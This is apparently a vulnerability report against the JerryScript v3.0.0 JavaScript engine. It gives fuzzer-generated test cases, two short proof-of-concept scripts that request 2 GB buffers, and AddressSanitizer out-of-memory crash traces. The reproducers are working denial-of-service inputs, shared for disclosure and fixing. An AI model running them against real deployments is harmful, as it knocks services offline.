```javascript
var r = new Int32Array ( 8 ) . sort ( ) ; r = new SharedArrayBuffer ( 2147483648 ) . slice ( 8 ) ; r = new Int32Array ( 128 ) . subarray ( 64 ) . sort ( d ) ; a = new Int32Array . set ( r ) ; var a ; r = r . toString ( r ) ; r . constructor = a ; set ( r ) ; assert ( a === r . toString ( 32 ) ) ;
```
// poc1.js
var r = new SharedArrayBuffer ( 2147483648 ) . slice () ;
Execution steps & Output
$ ./jerryscript/build/bin/jerry poc1.js
=================================================================
==2169015==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x80000000 bytes
#0 0x80efe65 in malloc (./jerryscript/build/bin/jerry+0x80efe65)
#1 0x825f11c in jmem_heap_alloc ./jerryscript/jerry-core/jmem/jmem-heap.c:254:10
#2 0x825f11c in jmem_heap_gc_and_alloc_block ./jerryscript/jerry-core/jmem/jmem-heap.c:291:24
#3 0x81d5463 in ecma_arraybuffer_allocate_buffer ./jerryscript/jerry-core/ecma/operations/ecma-arraybuffer-object.c:169:28
#4 0x81d7ae3 in ecma_arraybuffer_allocate_buffer_throw ./jerryscript/jerry-core/ecma/operations/ecma-arraybuffer-object.c:195:10
#5 0x81d7ae3 in ecma_builtin_arraybuffer_slice ./jerryscript/jerry-core/ecma/operations/ecma-arraybuffer-object.c:500:7
#6 0x8362abc in ecma_builtin_shared_arraybuffer_prototype_object_slice ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-shared-arraybuffer-prototype.c:104:10
#7 0x8362abc in ecma_builtin_shared_arraybuffer_prototype_dispatch_routine ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-shared-arraybuffer-prototype.inc.h:39:1
#8 0x81b94a4 in ecma_builtin_dispatch_routine ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460:10
#9 0x81b94a4 in ecma_builtin_dispatch_call ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489:12
#10 0x81fb6b7 in ecma_op_function_call_native_built_in ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217:5
#11 0x81fa81c in ecma_op_function_call ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411:16
#12 0x81fa5ce in ecma_op_function_validated_call ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1371:10
#13 0x82d7630 in opfunc_call ./jerryscript/jerry-core/vm/vm.c:758:5
#14 0x82d7630 in vm_execute ./jerryscript/jerry-core/vm/vm.c:5217:9
#15 0x82d4f61 in vm_run ./jerryscript/jerry-core/vm/vm.c:5312:10
#16 0x82d4c38 in vm_run_global ./jerryscript/jerry-core/vm/vm.c:286:25
#17 0x812a4e4 in jerry_run ./jerryscript/jerry-core/api/jerryscript.c:548:24
#18 0x83eac3e in jerryx_source_exec_script ./jerryscript/jerry-ext/util/sources.c:68:14
#19 0x812162c in main ./jerryscript/jerry-main/main-desktop.c:156:20
#20 0xf7be5ed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)
==2169015==HINT: if you don't care about these errors you may set allocator_may_return_null=1
SUMMARY: AddressSanitizer: out-of-memory (./jerryscript/build/bin/jerry+0x80efe65) in malloc
==2169015==ABORTING
Test case+
testcase
```javascript
var a = " 32 " ; var e = 4 ; var a = new ArrayBuffer ( 2147483648 , t ) ; Infinity ; var a = new Uint32Array ( a , e ) ; a === e ; new Int32Array ( a , e ) ; a <= e ; a = new Uint8Array ( a ) ; a = new Uint8ClampedArray ( a , e , a ) !== e ; a < e ; a >= e ; a <= e ; 0 == e !== null ; a != e ; a !== e ; false == 0 ; false == undefined === 0 ; var t = a . t ; " " === false ; " " == 0 ; " " === 0 ; false == undefined ; 0 == null ;
```
// poc2.js
var e = 4 ; var a = new ArrayBuffer ( 2147483648 ) ; var a = new Uint32Array ( a , e ) ; new Int32Array ( a , e ) ;
Execution steps & Output+
$ ./jerryscript/build/bin/jerry poc2.js
=================================================================
==2170063==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x7ffffffc bytes
#0 0x80efe65 in malloc (./jerryscript/build/bin/jerry+0x80efe65)
#1 0x825f11c in jmem_heap_alloc ./jerryscript/jerry-core/jmem/jmem-heap.c:254:10
#2 0x825f11c in jmem_heap_gc_and_alloc_block ./jerryscript/jerry-core/jmem/jmem-heap.c:291:24
#3 0x81d5463 in ecma_arraybuffer_allocate_buffer ./jerryscript/jerry-core/ecma/operations/ecma-arraybuffer-object.c:169:28
#4 0x82583e0 in ecma_typedarray_create_object_with_typedarray ./jerryscript/jerry-core/ecma/operations/ecma-typedarray-object.c:913:7
#5 0x82583e0 in ecma_op_create_typedarray ./jerryscript/jerry-core/ecma/operations/ecma-typedarray-object.c:1679:12
#6 0x81bad21 in ecma_typedarray_helper_dispatch_construct ./jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-helpers.c:60:22
#7 0x81ba8f4 in ecma_builtin_int32array_dispatch_construct ./jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-int32array.c:68:10
#8 0x81b99ce in ecma_builtin_dispatch_construct ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1518:10
#9 0x81fc476 in ecma_op_function_construct_built_in ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1537:28
#10 0x81fc476 in ecma_op_function_construct ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1717:14
#11 0x82d7255 in opfunc_construct ./jerryscript/jerry-core/vm/vm.c:840:7
#12 0x82d7255 in vm_execute ./jerryscript/jerry-core/vm/vm.c:5236:9
#13 0x82d4f61 in vm_run ./jerryscript/jerry-core/vm/vm.c:5312:10
#14 0x82d4c38 in vm_run_global ./jerryscript/jerry-core/vm/vm.c:286:25
#15 0x812a4e4 in jerry_run ./jerryscript/jerry-core/api/jerryscript.c:548:24
#16 0x83eac3e in jerryx_source_exec_script ./jerryscript/jerry-ext/util/sources.c:68:14
#17 0x812162c in main ./jerryscript/jerry-main/main-desktop.c:156:20
#18 0xf7c77ed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)
==2170063==HINT: if you don't care about these errors you may set allocator_may_return_null=1
SUMMARY: AddressSanitizer: out-of-memory (./jerryscript/build/bin/jerry+0x80efe65) in malloc
==2170063==ABORTING
JerryScript revision
Commit: https://github.com/jerryscript-project/jerryscript/commit/05dbbd134c3b9e2482998f267857dd3722001cd7 Version: v3.0.0
Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
Build steps
Test case
testcase
```javascript var r = new Int32Array ( 8 ) . sort ( ) ; r = new SharedArrayBuffer ( 2147483648 ) . slice ( 8 ) ; r = new Int32Array ( 128 ) . subarray ( 64 ) . sort ( d ) ; a = new Int32Array . set ( r ) ; var a ; r = r . toString ( r ) ; r . constructor = a ; set ( r ) ; assert ( a === r . toString ( 32 ) ) ; ```
Execution steps & Output
Test case+
testcase
```javascript var a = " 32 " ; var e = 4 ; var a = new ArrayBuffer ( 2147483648 , t ) ; Infinity ; var a = new Uint32Array ( a , e ) ; a === e ; new Int32Array ( a , e ) ; a <= e ; a = new Uint8Array ( a ) ; a = new Uint8ClampedArray ( a , e , a ) !== e ; a < e ; a >= e ; a <= e ; 0 == e !== null ; a != e ; a !== e ; false == 0 ; false == undefined === 0 ; var t = a . t ; " " === false ; " " == 0 ; " " === 0 ; false == undefined ; 0 == null ; ```
Execution steps & Output+
Credits: @Ye0nny, @EJueon of the seclab-yonsei.